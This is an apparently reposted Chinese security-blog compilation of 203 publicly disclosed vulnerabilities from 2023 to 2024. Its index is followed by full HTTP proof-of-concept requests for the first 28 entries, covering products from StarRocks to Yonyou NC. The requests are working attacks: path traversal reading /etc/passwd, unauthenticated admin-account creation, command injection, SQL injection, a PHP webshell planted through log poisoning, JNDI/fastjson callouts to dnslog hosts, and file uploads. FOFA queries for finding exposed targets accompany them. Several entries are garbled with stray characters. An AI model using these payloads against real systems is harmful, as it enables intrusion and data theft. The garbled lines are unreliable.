Compilation of publicly disclosed internet vulnerabilities 202309-202406 (repost)

Posted 2024-6-5 14:31:29

道一安全 2024-06-05 07:41 北京
The following article is from 网络安全新视界, author 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and we hope this article helps with defence. Defenders can use its contents to check their own environment for risk.

Vulnerability sources: the article covers 203 POCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that are too long are replaced by the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the relevant content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is already the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).
Contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
21. 大华 ICC intelligent IoT integrated management platform random remote code execution
22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
25. 用友 NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo interface SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 (Newcapec) handheld campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. 安恒 (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信 (Qi'anxin) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording and broadcasting system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达 (Glodon) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical picture archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet access behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS 海洋影视 management system dmku SQL injection
201. 方正 (Founder) omnimedia news gathering and editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload
POC list

02
1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the backend with the default account admin, then perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: executes the function and applies base64 encoding
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target range to run the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command string
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function to compute the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC智能物联综合管理平台random远程代码执行9 [1 Y8 i" G% N4 G! b4 G
FOFA:icon_hash="-1935899595"
' z$ T+ N7 m5 |7 `& R. NPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.11 K8 u7 Q, a9 g# k+ M- k3 n
Host: x.x.x.x$ b6 t6 r9 H5 T, ?( i6 [+ z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 q- A* q/ X, n# DContent-Length: 161+ \0 C( ]; p9 T; {, d
Accept-Encoding: gzip$ L& R" V3 J. \% d; \' d# q' H
Connection: close7 B! e( I7 _% ?
Content-Type: application/json;charset=utf-8
" [. V/ S6 I; I4 w6 a* ^" ]. N' P2 f, _  n& B4 B
{9 [' U, l5 Z/ X0 V' j- N0 V# F
"a":{
8 b/ O# R$ |7 T5 y* B2 O. l0 ^1 z   "@type":"com.alibaba.fastjson.JSONObject",
5 L- N5 K( S: p& |7 w3 `2 X    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
: w5 q: h6 W8 ]; i1 Y* |, l  }""
& {) G& U/ v$ ?1 r- X}
2 f/ o# T. a1 _' ?' ]
( M. q- o3 j1 n; o3 _$ x. L
9 l) c1 c* g+ F* F1 y  A( l! \1 T22. 大华ICC智能物联综合管理平台 log4j远程代码执行8 Y, O. x! P: U6 _# D
FOFA:icon_hash="-1935899595"
7 Q7 @% O" ^- _' v( kPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1( l0 r0 \3 ^* b  f; I, n
Host: your-ip; b$ ?0 [9 |9 F( T) x" }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! b4 R! A" k+ u' ?8 ?1 M: L6 u
Content-Type: application/json;charset=utf-8
" C  z" U" S& |; }
4 F' W& v: R% X$ m* k5 A{
7 {3 D4 A- v1 H- |3 w"loginName":"${jndi:ldap://dnslog}"
4 p8 F* G  d: J" \) U; c}( t6 ~( W& x5 e8 K8 O
6 m# r9 l9 v3 ~

" U" u, ?# s6 Y. J4 Y  x7 o1 ~2 J% ]" \3 g1 B& O0 z
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行- A/ I, A4 f, I) d
FOFA:icon_hash="-1935899595"# Y' P( J4 V3 g* x- C) D2 B: T
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
6 R  q5 v% }8 Z1 ~/ kHost: your-ip; W) `  m5 L2 k% B0 D1 w  s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ p/ Z& S& {, b# P
Content-Type: application/json;charset=utf-8
# X) d) v6 }5 l/ y6 F7 s. w) QAccept-Encoding: gzip5 k. B- N2 D) {4 o" r
Connection: close- o& y; a9 Y5 Z, z2 }
& V' X' ]  e' h, [: H: m4 I
{
- ~0 g$ }" Z! e4 H! p9 y2 |; z  Q    "a":{
( C9 i2 Z/ u' U' F8 c        "@type":"com.alibaba.fastjson.JSONObject",% |  b. n( D6 h, J. v6 K' Z
       {"@type":"java.net.URL","val":"http://DNSLOG"}
& d, T& v3 w" K7 S        }""
; c! \, d9 m# P2 ~: U6 L  [}8 i! N# d# L: v- r1 V7 o0 o
1 j! `  m1 u# A2 u, B( X

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--


25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
